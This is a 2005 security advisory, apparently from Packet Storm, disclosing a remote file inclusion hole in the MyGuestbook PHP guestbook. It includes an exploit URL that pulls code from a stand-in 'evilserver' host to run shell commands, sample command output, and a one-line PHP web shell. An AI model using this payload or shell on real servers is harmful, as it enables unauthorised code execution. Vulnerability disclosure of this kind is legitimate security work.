Lucene search

K
packetstormSoulBlack Security ResearchPACKETSTORM:38506
HistoryJul 07, 2005 - 12:00 a.m.

myguestbook_advisory.txt

2005-07-0700:00:00
SoulBlack Security Research
packetstormsecurity.com
20
`===========================================================  
  
============================================================  
Title: MyGuestbook Remote File Inclusion.  
Vulnerability Discovery: SoulBlack - Security Research -  
http://soulblack.com.ar  
Date: 05/07/2005  
Severity: High. Remote Users Can Execute Arbitrary Code.  
Affected version: 0.6.1 (Only Tested in 0.6.1)  
Vendor: http://html-design.com/  
============================================================  
  
============================================================  
  
* Summary *  
  
This is a simple MySQL based Guestbook.  
  
-------------------------------------------------------------  
  
* Problem Description *  
  
The bug reside in form.inc.php3.  
  
Vulnerable Code  
  
<?  
include("$lang.lang.inc.php3");  
?>  
  
/*  
  
http://server/gb/form.inc.php3?lang=http://evilserver/cmd.gif?&cmd=id;uname%20-a;uptime  
  
uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux cyan-1.farm.de  
2.4.18custom_ko_w_ipsec #10 Fre Apr 19 13:05:46 CEST 2002 i686 unknown 6:51pm  
up 463 days, 15:43, 0 users, load average: 0.00, 0.01, 0.02  
  
*/  
  
/*  
-------  
cmd.gif  
-------  
  
<?  
system($cmd);  
?>  
  
*/  
  
-------------------------------------------------------------  
  
  
-------------------------------------------------------------  
  
* Fix *  
  
Contact the Vendor.  
  
-------------------------------------------------------------  
  
* References *  
  
http://www.soulblack.com.ar/repo/papers/advisory/myguestbook_advisory.txt  
  
-------------------------------------------------------------  
  
* Credits *  
  
Vulnerability reported by SoulBlack Security Research  
  
============================================================  
  
--  
SoulBlack - Security Research  
http://www.soulblack.com.ar  
`